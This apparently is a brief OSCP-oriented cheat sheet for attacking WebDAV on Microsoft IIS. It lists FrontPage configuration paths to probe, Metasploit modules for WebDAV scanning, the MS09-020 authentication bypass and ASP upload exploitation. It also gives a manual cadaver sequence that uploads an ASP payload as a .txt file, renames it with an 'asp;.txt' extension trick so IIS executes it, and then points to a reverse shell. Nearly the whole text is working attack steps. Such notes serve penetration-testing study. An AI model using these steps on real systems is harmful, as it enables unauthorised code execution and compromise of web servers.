# Check on the Web port (80 ?):# _vti_pvt for OSCP
/_vti_pvt/access.cnf
/_vti_pvt/service.cnf
/_vti_inf.htm
WebDAV Exploitation using Metasploit
# Checking WebDAV using metasploit
use auxiliary/scanner/http/webdav_scanner
set rhosts <IP>
run
# Content discovery using metasploit
use auxiliary/scanner/http/webdav_website_content
set rhosts <IP>
run
# Checking authentication using metasploit
use auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
set rhosts <IP>
run
# Upload exploitation using metasploit
use exploit/windows/iis/iis_webdav_upload_asp
Manual WebDAV exploitation (cadaver)
cadaver http://IP/
# Goal is to upload file on IIS Server.
ls
# Find a directory where we can upload.cd <path>
# Test for upload
put /path/to/test.asp test.asp
# Upload payload
put /path/to/payload.asp longnamebrotesttest123456789.txt
# Copy and rename payload
copy longnamebrotesttest123456789.txt longnamebrotesttest123456789.asp;.txt
# Access (should execute the ASP content)
http://IP/_vti_pvt/longnamebrotesttest123456789.asp%3b.txt
# Then go for reverse shell